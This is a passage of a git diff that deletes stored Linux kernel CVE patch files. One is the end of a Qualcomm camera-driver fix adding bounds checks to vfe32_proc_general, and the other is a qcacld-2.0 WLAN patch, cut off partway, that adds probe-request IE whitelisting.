-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			vfe32_cmd[cmd->id].offset,
-@@ -3118,10 +3273,23 @@ static int vfe32_proc_general(
- 
- 		new_val = new_val | old_val;
- 		*cmdp_local = new_val;
-+		if (cmd->length < 4) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_DEMOSAICV3_0_OFF,
- 			cmdp_local, 4);
- 		cmdp_local += 1;
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < (vfe32_cmd[cmd->id].length +
-+		sizeof(uint32_t) * 1)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			vfe32_cmd[cmd->id].offset,
-@@ -3150,9 +3318,18 @@ static int vfe32_proc_general(
- 
- 		new_val = new_val | old_val;
- 		*cmdp_local = new_val;
-+		if (cmd->length < V32_DEMOSAICV3_LEN) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase +
- 			V32_DEMOSAICV3_0_OFF,
- 			cmdp_local, V32_DEMOSAICV3_LEN);
-+		if (cmd->length < (V32_DEMOSAICV3_DBPC_LEN +
-+		sizeof(uint32_t) * 4)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp_local += 1;
- 		msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase +
- 			V32_DEMOSAICV3_DBPC_CFG_OFF,
-@@ -3183,6 +3360,11 @@ static int vfe32_proc_general(
- 			rc = -EFAULT;
- 			goto proc_general_done;
- 		}
-+		if (cmd->length < (sizeof(uint32_t) * (1 +
-+		VFE32_GAMMA_NUM_ENTRIES / 2))) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF,
- 			cmdp, 4);
-@@ -3207,6 +3389,16 @@ static int vfe32_proc_general(
- 			rc = -EFAULT;
- 			goto proc_general_done;
- 		}
-+		maxvalue = (VFE32_GAMMA_CH0_G_POS > VFE32_GAMMA_CH1_B_POS) ?
-+		VFE32_GAMMA_CH0_G_POS : VFE32_GAMMA_CH1_B_POS;
-+		maxvalue = (maxvalue > VFE32_GAMMA_CH2_R_POS) ?
-+		maxvalue : VFE32_GAMMA_CH2_R_POS;
-+
-+		if (cmd->length < (sizeof(uint32_t) * (1 +
-+		maxvalue + (VFE32_GAMMA_NUM_ENTRIES / 2)))) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF,
- 			cmdp, 4);
-@@ -3236,6 +3428,17 @@ static int vfe32_proc_general(
- 		old_val = msm_camera_io_r(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF);
- 			cmdp += 1;
-+
-+		maxvalue = (VFE32_GAMMA_CH0_G_POS > VFE32_GAMMA_CH1_B_POS) ?
-+		VFE32_GAMMA_CH0_G_POS : VFE32_GAMMA_CH1_B_POS;
-+		maxvalue = (maxvalue > VFE32_GAMMA_CH2_R_POS) ?
-+		maxvalue : VFE32_GAMMA_CH2_R_POS;
-+
-+		if (cmd->length < (sizeof(uint32_t) * (1 +
-+		maxvalue + (VFE32_GAMMA_NUM_ENTRIES / 2)))) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		if (old_val != 0x0) {
- 			vfe32_write_gamma_cfg(RGBLUT_RAM_CH0_BANK0,
- 				cmdp + VFE32_GAMMA_CH0_G_POS, vfe32_ctrl);
-@@ -3271,6 +3474,11 @@ static int vfe32_proc_general(
- 		old_val = msm_camera_io_r(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_RGB_G_OFF);
- 		cmdp += 1;
-+		if (cmd->length < (sizeof(uint32_t) * (1 + (
-+		VFE32_GAMMA_NUM_ENTRIES / 2)))) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		if (old_val != 0x0) {
- 			vfe32_write_gamma_cfg(
- 				RGBLUT_RAM_CH0_BANK0, cmdp, vfe32_ctrl);
-@@ -3442,10 +3650,24 @@ static int vfe32_proc_general(
- 			rc = -EFAULT;
- 			goto proc_general_done;
- 		}
-+		/* As cmdp gets incremented 7 times in function
-+		vfe32_sync_timer_start() */
-+		if (cmd->length < (sizeof(uint32_t) * 7)) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		vfe32_sync_timer_start(cmdp, vfe32_ctrl);
- 		break;
- 
- 	case VFE_CMD_MODULE_CFG: {
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -3496,11 +3718,24 @@ static int vfe32_proc_general(
- 			rc = -EFAULT;
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			vfe32_cmd[cmd->id].offset,
- 			cmdp, (vfe32_cmd[cmd->id].length));
- 		cmdp_local = cmdp + V32_ASF_LEN/4;
-+		if (cmd->length < (sizeof(uint32_t) * (V32_ASF_LEN / 4) +
-+		V32_ASF_SPECIAL_EFX_CFG_LEN)) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_ASF_SPECIAL_EFX_CFG_OFF,
-@@ -3508,6 +3743,12 @@ static int vfe32_proc_general(
- 		break;
- 
- 	case VFE_CMD_PCA_ROLL_OFF_CFG:
-+
-+		if (cmd->length < (sizeof(uint32_t) * (8 + 4 *
-+		V33_PCA_ROLL_OFF_TABLE_SIZE))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -3566,6 +3807,11 @@ static int vfe32_proc_general(
- 		break;
- 
- 	case VFE_CMD_PCA_ROLL_OFF_UPDATE:
-+		if (cmd->length < (sizeof(uint32_t) * (8 + 4 *
-+		V33_PCA_ROLL_OFF_TABLE_SIZE))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch
deleted file mode 100644
index ef987dcb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,1217 +0,0 @@
-From 1379bfb6c09ee2ad5969db45c27fb675602b4ed0 Mon Sep 17 00:00:00 2001
-From: Rajeev Kumar Sirasanagandla <rsirasan@codeaurora.org>
-Date: Sat, 5 Nov 2016 18:37:04 +0530
-Subject: qcacld-2.0: Add support to include selective scan IEs only
-
-Add support to include only selective IEs in probe requests in
-order to improve user's privacy.
-
-Change-Id: Ib874af7ec2f5453282ffe0e8fc2e50934460b745
-CRs-Fixed: 1086582
----
- CORE/HDD/inc/wlan_hdd_cfg.h                    |  79 ++++++
- CORE/HDD/inc/wlan_hdd_main.h                   |   5 +
- CORE/HDD/src/wlan_hdd_cfg.c                    | 317 +++++++++++++++++++++++++
- CORE/HDD/src/wlan_hdd_cfg80211.c               | 100 +++++++-
- CORE/HDD/src/wlan_hdd_main.c                   |  26 +-
- CORE/MAC/inc/sirApi.h                          |  39 ++-
- CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c |  22 +-
- CORE/SERVICES/WMA/wma.c                        | 128 +++++++++-
- CORE/SME/inc/csrApi.h                          |   4 +
- CORE/SME/src/csr/csrApiScan.c                  |  62 ++++-
- CORE/SME/src/pmc/pmcApi.c                      |   7 +-
- 11 files changed, 774 insertions(+), 15 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg.h b/CORE/HDD/inc/wlan_hdd_cfg.h
-index 6207a15..301ded4 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg.h
-@@ -58,6 +58,8 @@
- 
- //Number of items that can be configured
- #define MAX_CFG_INI_ITEMS   1024
-+#define MAX_PRB_REQ_VENDOR_OUI_INI_LEN 160
-+#define VENDOR_SPECIFIC_IE_BITMAP 0x20000000
- 
- #ifdef SAP_AUTH_OFFLOAD
- /* 802.11 pre-share key length */
-@@ -4206,6 +4208,66 @@ FG_BTC_BT_INTERVAL_PAGE_P2P_STA_DEFAULT
- #define CFG_5G_MAX_RSSI_PENALIZE_MAX             (20)
- #define CFG_5G_MAX_RSSI_PENALIZE_DEFAULT         (10)
- 
-+/* enable/disable probe request whiltelist IE feature */
-+#define CFG_PRB_REQ_IE_WHITELIST_NAME    "g_enable_probereq_whitelist_ies"
-+#define CFG_PRB_REQ_IE_WHITELIST_MIN     (0)
-+#define CFG_PRB_REQ_IE_WHITELIST_MAX     (1)
-+#define CFG_PRB_REQ_IE_WHITELIST_DEFAULT (0)
-+/*
-+ * For IE white listing in Probe Req, following ini parameters from
-+ * g_probe_req_ie_bitmap_0 to g_probe_req_ie_bitmap_7 are used. User needs to
-+ * input this values in hexa decimal format, when bit is set, corresponding ie
-+ * needs to be included in probe request.
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP0_NAME    "g_probe_req_ie_bitmap_0"
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP1_NAME    "g_probe_req_ie_bitmap_1"
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP2_NAME    "g_probe_req_ie_bitmap_2"
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP3_NAME    "g_probe_req_ie_bitmap_3"
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP4_NAME    "g_probe_req_ie_bitmap_4"
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP5_NAME    "g_probe_req_ie_bitmap_5"
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP6_NAME    "g_probe_req_ie_bitmap_6"
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT (0x00000000)
-+
-+#define CFG_PRB_REQ_IE_BIT_MAP7_NAME    "g_probe_req_ie_bitmap_7"
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT (0x00000000)
-+
-+/*
-+ * For vendor specific IE, Probe Req OUI types and sub types which are
-+ * to be white listed are specifed in gProbeReqOUIs in the following
-+ * example format - gProbeReqOUIs=AABBCCDD EEFF1122
-+ */
-+#define CFG_PROBE_REQ_OUI_NAME    "gProbeReqOUIs"
-+#define CFG_PROBE_REQ_OUI_DEFAULT ""
-+
-+
- /*---------------------------------------------------------------------------
-   Type declarations
-   -------------------------------------------------------------------------*/
-@@ -5020,6 +5082,20 @@ struct hdd_config {
-    int8_t                      rssi_penalize_threshold_5g;
-    uint8_t                     rssi_penalize_factor_5g;
-    uint8_t                     max_rssi_penalize_5g;
-+
-+   bool probe_req_ie_whitelist;
-+   /* probe request bit map ies */
-+   uint32_t probe_req_ie_bitmap_0;
-+   uint32_t probe_req_ie_bitmap_1;
-+   uint32_t probe_req_ie_bitmap_2;
-+   uint32_t probe_req_ie_bitmap_3;
-+   uint32_t probe_req_ie_bitmap_4;
-+   uint32_t probe_req_ie_bitmap_5;
-+   uint32_t probe_req_ie_bitmap_6;
-+   uint32_t probe_req_ie_bitmap_7;
-+
-+   /* Probe Request multiple vendor OUIs */
-+   uint8_t probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN];
- };
- 
- typedef struct hdd_config hdd_config_t;
-@@ -5137,6 +5213,9 @@ static __inline unsigned long utilMin( unsigned long a, unsigned long b )
-   Function declarations and documentation
-   -------------------------------------------------------------------------*/
- VOS_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx);
-+uint32_t hdd_validate_prb_req_ie_bitmap(hdd_context_t* pHddCtx);
-+VOS_STATUS hdd_parse_probe_req_ouis(hdd_context_t* pHddCtx);
-+void hdd_free_probe_req_ouis(hdd_context_t* pHddCtx);
- VOS_STATUS hdd_update_mac_config(hdd_context_t *pHddCtx);
- VOS_STATUS hdd_set_sme_config( hdd_context_t *pHddCtx );
- VOS_STATUS hdd_set_sme_chan_list(hdd_context_t *hdd_ctx);
-diff --git a/CORE/HDD/inc/wlan_hdd_main.h b/CORE/HDD/inc/wlan_hdd_main.h
-index 8a70ab5..953aca0 100644
---- a/CORE/HDD/inc/wlan_hdd_main.h
-+++ b/CORE/HDD/inc/wlan_hdd_main.h
-@@ -265,6 +265,8 @@ typedef v_U8_t tWlanHddMacAddr[HDD_MAC_ADDR_LEN];
- 
- #define HDD_BW_GET_DIFF(_x, _y) (unsigned long)((ULONG_MAX - (_y)) + (_x) + 1)
- 
-+#define MAX_PROBE_REQ_OUIS 16
-+
- /*
-  * Generic asynchronous request/response support
-  *
-@@ -1894,6 +1896,9 @@ struct hdd_context_s
-     vos_timer_t tdls_source_timer;
-     struct hdd_scan_chan_info *chan_info;
-     struct mutex chan_info_lock;
-+
-+    uint32_t no_of_probe_req_ouis;
-+    struct vendor_oui *probe_req_voui;
- };
- 
- /*---------------------------------------------------------------------------
-diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c
-index c00ade7..787ae45 100644
---- a/CORE/HDD/src/wlan_hdd_cfg.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg.c
-@@ -4835,6 +4835,74 @@ REG_TABLE_ENTRY g_registry_table[] =
-                 CFG_5G_MAX_RSSI_PENALIZE_DEFAULT,
-                 CFG_5G_MAX_RSSI_PENALIZE_MIN,
-                 CFG_5G_MAX_RSSI_PENALIZE_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_WHITELIST_NAME, WLAN_PARAM_Integer,
-+                hdd_config_t, probe_req_ie_whitelist,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_WHITELIST_DEFAULT,
-+                CFG_PRB_REQ_IE_WHITELIST_MIN,
-+                CFG_PRB_REQ_IE_WHITELIST_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP0_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_0,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP0_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP0_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP1_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_1,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP1_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP1_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP2_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_2,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP2_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP2_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP3_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_3,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP3_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP3_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP4_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_4,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP4_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP4_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP5_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_5,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP5_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP5_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP6_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_6,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP6_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP6_MAX),
-+
-+   REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP7_NAME, WLAN_PARAM_HexInteger,
-+                hdd_config_t, probe_req_ie_bitmap_7,
-+                VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT,
-+                CFG_PRB_REQ_IE_BIT_MAP7_MIN,
-+                CFG_PRB_REQ_IE_BIT_MAP7_MAX),
-+
-+   REG_VARIABLE_STRING(CFG_PROBE_REQ_OUI_NAME, WLAN_PARAM_String,
-+                       hdd_config_t, probe_req_ouis,
-+                       VAR_FLAGS_OPTIONAL,
-+                       (void *)CFG_PROBE_REQ_OUI_DEFAULT),
- };
- 
- 
-@@ -5691,6 +5759,46 @@ void print_hdd_cfg(hdd_context_t *pHddCtx)
-   hddLog(LOG2, "Name = [%s] Value = [%u] ",
-                  CFG_TDLS_ENABLE_DEFER_TIMER,
-                  pHddCtx->cfg_ini->tdls_enable_defer_time);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_WHITELIST_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_whitelist);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP0_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_0);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP1_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_1);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP2_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_2);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP3_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_3);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP4_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_4);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP5_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_5);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP6_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_6);
-+
-+  hddLog(LOG2, "Name = [%s] Value = [%x] ",
-+               CFG_PRB_REQ_IE_BIT_MAP7_NAME,
-+               pHddCtx->cfg_ini->probe_req_ie_bitmap_7);
-+
-+  hddLog(LOG2, "Name = [%s] Value =[%s]",
-+               CFG_PROBE_REQ_OUI_NAME,
-+               pHddCtx->cfg_ini->probe_req_ouis);
- }
- 
- #define CFG_VALUE_MAX_LEN 256
-@@ -8187,3 +8295,212 @@ void hdd_set_btc_bt_wlan_interval(hdd_context_t *hdd_ctx)
- 	if (VOS_STATUS_SUCCESS != status)
- 		hddLog(LOGE, "Fail to set enable bt wlan coex parameters");
- }
-+
-+/**
-+ * hdd_validate_prb_req_ie_bitmap - validates user input for ie bit map
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function checks whether user have entered valid probe request
-+ * ie bitmap and also verifies vendor ouis if vendor specific ie is set
-+ *
-+ * Return: status of verification
-+ *              1 - valid input
-+ *              0 - invalid input
-+ */
-+uint32_t hdd_validate_prb_req_ie_bitmap(hdd_context_t* pHddCtx)
-+{
-+	if (!(pHddCtx->cfg_ini->probe_req_ie_bitmap_0 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_1 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_2 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_3 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_4 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_5 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_6 ||
-+	    pHddCtx->cfg_ini->probe_req_ie_bitmap_7))
-+		return 0;
-+
-+	/**
-+	 * check whether vendor oui IE is set and OUIs are present, each OUI
-+	 * is eneterd in the form of string of 8 characters from ini, therefore,
-+	 * for atleast one OUI, minimum length is 8 and hence this string length
-+	 * is checked for minimum of 8
-+	 */
-+	if ((pHddCtx->cfg_ini->probe_req_ie_bitmap_6 &
-+	     VENDOR_SPECIFIC_IE_BITMAP) &&
-+	     (strlen(pHddCtx->cfg_ini->probe_req_ouis) < 8))
-+		return 0;
-+
-+	/* check whether vendor oui IE is not set but OUIs are present */
-+	if (!(pHddCtx->cfg_ini->probe_req_ie_bitmap_6 &
-+	    VENDOR_SPECIFIC_IE_BITMAP) &&
-+	    (strlen(pHddCtx->cfg_ini->probe_req_ouis) > 0))
-+		return 0;
-+
-+	return 1;
-+}
-+
-+/**
-+ * probe_req_voui_convert_to_hex - converts str of 8 chars into two hex values
-+ * @temp: string to be converted
-+ * @voui: contains the type and subtype values
-+ *
-+ * This function converts the string length of 8 characters into two
-+ * hexa-decimal values, oui_type and oui_subtype, where oui_type is the
-+ * hexa decimal value converted from first 6 characters and oui_subtype is
-+ * hexa decimal value converted from last 2 characters.
-+ * strings which doesn't match with the specified pattern are ignored.
-+ *
-+ * Return: status of conversion
-+ *	   1 - if conversion is successful
-+ *	   0 - if conversion is failed
-+ */
-+static uint32_t hdd_probe_req_voui_convert_to_hex(uint8_t *temp,
-+						  struct vendor_oui *voui)
-+{
-+	uint32_t hex_value[4];
-+	uint32_t i = 0;
-+	uint32_t indx = 0;
-+
-+	memset(hex_value, 0x00, sizeof(hex_value));
-+	memset(voui, 0x00, sizeof(*voui));
-+
-+	/* convert string to hex */
-+	for (i = 0; i < 8; i++) {
-+		if (temp[i] >= '0' && temp[i] <= '9') {
-+			hex_value[indx] = (temp[i] - '0') << 4;
-+		} else if (temp[i] >= 'A' && temp[i] <= 'F') {
-+			hex_value[indx] = (temp[i] - 'A') + 0xA;
-+			hex_value[indx] = hex_value[indx] << 4;
-+		} else {
-+			/* invalid character in oui */
-+			return 0;
-+		}
-+
-+		if (temp[i + 1] >= '0' && temp[i + 1] <= '9') {
-+			hex_value[indx] |= (temp[i + 1] - '0');
-+			i = i + 1;
-+			indx = indx + 1;
-+		} else if (temp[i + 1] >= 'A' && temp[i + 1] <= 'F') {
-+			hex_value[indx] |= ((temp[i + 1] - 'A') + 0xA);
-+			i = i + 1;
-+			indx = indx + 1;
-+		} else {
-+			/* invalid character in oui */
-+			return 0;
-+		}
-+	}
-+
-+	voui->oui_type = (hex_value[0] | (hex_value[1] << 8) |
-+			 (hex_value[2] << 16));
-+	voui->oui_subtype = hex_value[3];
-+
-+	hddLog(LOG1, FL("OUI_type = %x and OUI_subtype = %x"), voui->oui_type,
-+							voui->oui_subtype);
-+	return 1;
-+}
-+
-+/**
-+ * hdd_parse_probe_req_ouis - form ouis from ini gProbeReqOUIs
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function parses the ini string gProbeReqOUIs which needs to in the
-+ * following format:
-+ * "<8 characters of [0-9] or [A-F]>space<8 characters from [0-9] etc.,"
-+ * example: "AABBCCDD 1122EEFF"
-+ * and the logic counts the number of OUIS and allocates the memory
-+ * for every valid OUI and is stored in hdd_context_t
-+ *
-+ * Return: status of parsing
-+ */
-+VOS_STATUS hdd_parse_probe_req_ouis(hdd_context_t* pHddCtx)
-+{
-+	struct vendor_oui voui[MAX_PROBE_REQ_OUIS];
-+	uint8_t *str;
-+	uint8_t temp[9];
-+	uint32_t start = 0, end = 0;
-+	uint32_t oui_indx = 0;
-+	uint32_t i = 0;
-+
-+	pHddCtx->cfg_ini->probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN - 1] =
-+									'\0';
-+	if (!strlen(pHddCtx->cfg_ini->probe_req_ouis)) {
-+		pHddCtx->no_of_probe_req_ouis = 0;
-+		pHddCtx->probe_req_voui = NULL;
-+		hddLog(LOG1, FL("NO OUIS to parse"));
-+		return VOS_STATUS_SUCCESS;
-+	}
-+
-+	str = (uint8_t *)(pHddCtx->cfg_ini->probe_req_ouis);
-+
-+	while(str[i] != '\0') {
-+		if (str[i] == ' ') {
-+			if ((end - start) != 8)
-+			{
-+				end = start = 0;
-+				i++;
-+				continue;
-+			} else {
-+				memcpy(temp, &str[i - 8], 8);
-+				i++;
-+				temp[8] = '\0';
-+				if (hdd_probe_req_voui_convert_to_hex(temp,
-+					&voui[oui_indx]) == 0) {
-+					continue;
-+				}
-+				oui_indx++;
-+				if (oui_indx > MAX_PROBE_REQ_OUIS) {
-+					hddLog(LOGE, "Max no.of OUIS supported "
-+						"is 16. ignoring the rest");
-+					return VOS_STATUS_SUCCESS;
-+				}
-+			}
-+			start = end = 0;
-+		} else {
-+			i++;
-+			end++;
-+		}
-+	}
-+
-+	if ((end - start) == 8) {
-+		memcpy(temp, &str[i - 8], 8);
-+		temp[8] = '\0';
-+		if (hdd_probe_req_voui_convert_to_hex(temp,
-+		    &voui[oui_indx]) == 1)
-+			oui_indx++;
-+	}
-+
-+	if (!oui_indx)
-+		return VOS_STATUS_SUCCESS;
